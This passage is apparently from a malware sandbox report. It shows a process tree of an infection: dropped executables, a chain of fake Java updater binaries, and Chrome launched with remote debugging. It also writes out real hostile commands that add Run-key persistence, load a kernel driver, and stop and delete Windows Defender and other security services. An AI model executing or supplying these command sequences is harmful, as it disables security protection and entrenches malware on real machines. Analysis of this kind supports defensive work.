        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2016,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:13
        10⤵
        
        PID:34440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=3192 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:34516
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:34528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4124,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=3852 /prefetch:9
        10⤵
        Uses browser remote debugging
        
        PID:33312
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4536,i,2287239991902363539,8587965660113141562,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:34576
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 1344
        9⤵
        Program crash
        
        PID:15096
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 1360
        9⤵
        Program crash
        
        PID:19136
        
        C:\ProgramData\y5xtj5pzmg.exe
        
        "C:\ProgramData\y5xtj5pzmg.exe"
        7⤵
        
        PID:12916
        
        C:\Users\Admin\AppData\Local\Temp\bHt28Zow\leYmMnjYfY2zaADV.exe
        
        C:\Users\Admin\AppData\Local\Temp\bHt28Zow\leYmMnjYfY2zaADV.exe 0
        8⤵
        
        PID:9020
        
        C:\Users\Admin\AppData\Local\Temp\bHt28Zow\ZZIc1t7zu23pCQFQ.exe
        
        C:\Users\Admin\AppData\Local\Temp\bHt28Zow\ZZIc1t7zu23pCQFQ.exe 9020
        9⤵
        
        PID:12232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12232 -s 684
        10⤵
        Program crash
        
        PID:31312
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9020 -s 1080
        9⤵
        Program crash
        
        PID:22844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\gd2va" & exit
        7⤵
        
        PID:24524
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:31152
    - - C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:10208
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:10424
    - - C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        5⤵
        
        PID:13584
      - C:\Users\Admin\AppData\Local\Temp\is-4J9GJ.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4J9GJ.tmp\Bell_Setup16.tmp" /SL5="$32025E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        6⤵
        
        PID:13848
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        7⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\is-8T7S2.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8T7S2.tmp\Bell_Setup16.tmp" /SL5="$33025E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        8⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        9⤵
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9472
    - - C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        5⤵
        
        PID:9084
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        6⤵
        
        PID:10732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        7⤵
        
        PID:12072
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        
        PID:13332
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        9⤵
        
        PID:13792
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        10⤵
        
        PID:14236
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        11⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        12⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        13⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        14⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        15⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        16⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        17⤵
        
        PID:9240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        18⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        19⤵
        
        PID:9776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        20⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        21⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        22⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        23⤵
        
        PID:5860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        24⤵
        
        PID:12324
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        25⤵
        
        PID:12384
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        26⤵
        
        PID:12676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        27⤵
        
        PID:13416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        28⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        29⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        30⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        31⤵
        
        PID:5540
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        32⤵
        
        PID:5612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        33⤵
        
        PID:5732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        34⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        35⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        36⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        37⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        38⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        39⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        40⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        41⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        42⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        43⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        44⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        45⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        46⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        47⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        48⤵
        
        PID:7176
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        49⤵
        
        PID:7204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        50⤵
        
        PID:7240
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        51⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        52⤵
        
        PID:7756
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        53⤵
        
        PID:8032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        54⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        55⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        56⤵
        
        PID:6220
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javapluginw.exe"
        57⤵
        Modifies registry key
        
        PID:8452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javapluginw.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe\"'"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8772
    - - C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
        5⤵
        
        PID:8748
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:8896
    - - C:\Users\Admin\AppData\Local\Temp\10043090101\530a71ca97.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043090101\530a71ca97.exe"
        5⤵
        
        PID:13228
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043090101\530a71ca97.exe"
        6⤵
        
        PID:7728
    - - C:\Users\Admin\AppData\Local\Temp\10043100101\a1996fd831.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043100101\a1996fd831.exe"
        5⤵
        
        PID:8400
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10043100101\a1996fd831.exe"
        6⤵
        
        PID:14216
- - C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe
    "C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"
    3⤵
    - Executes dropped EXE
    PID:10172
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      4⤵
      Executes dropped EXE
      PID:10388
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        5⤵
        Executes dropped EXE
        
        PID:10592
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        6⤵
        Executes dropped EXE
        
        PID:10676
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        7⤵
        Executes dropped EXE
        
        PID:10844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        8⤵
        Executes dropped EXE
        
        PID:10984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        9⤵
        Executes dropped EXE
        
        PID:476
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        10⤵
        Executes dropped EXE
        
        PID:11244
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        11⤵
        Executes dropped EXE
        
        PID:11684
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        12⤵
        Executes dropped EXE
        
        PID:12308
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        13⤵
        Executes dropped EXE
        
        PID:12608
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        14⤵
        Executes dropped EXE
        
        PID:480
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        15⤵
        Executes dropped EXE
        
        PID:6084
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        16⤵
        Executes dropped EXE
        
        PID:6296
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        17⤵
        Executes dropped EXE
        
        PID:6760
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        18⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        19⤵
        
        PID:7172
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        20⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        21⤵
        
        PID:7548
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        22⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        23⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        24⤵
        
        PID:2704
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_platform.exe"
        25⤵
        Modifies registry key
        
        PID:8392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe\"'"
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8536
- - C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\22.exe
      "C:\Users\Admin\AppData\Local\Temp\22.exe"
      4⤵
      PID:2612
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FC1E.tmp\FC1F.tmp\FC20.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
        5⤵
        
        PID:9144
      - C:\Users\Admin\AppData\Local\Temp\22.exe
        
        "C:\Users\Admin\AppData\Local\Temp\22.exe" go
        6⤵
        
        PID:10052
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FFE7.tmp\FFE8.tmp\FFE9.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
        7⤵
        
        PID:11160
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:12480
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:5344
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:4128
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:10648
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:11820
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2740
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7056
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:7576
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:9180
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:9988
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:788
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5228
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:8352
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:10132
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:11824
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:12940
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:5748
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:9372
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:6864
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:4432
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:8184
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        
        PID:8528
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:8708
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:10112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:10484
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:10500
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:10616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:10208
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:7320
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:836
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:10944
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:1336
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:11036
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:11388
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:13168
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:4988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:6768
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:7916
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:8656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:9608
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:9872
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:12880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:12148
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:13880
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:13696
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:10272
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:14140
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:13792
        
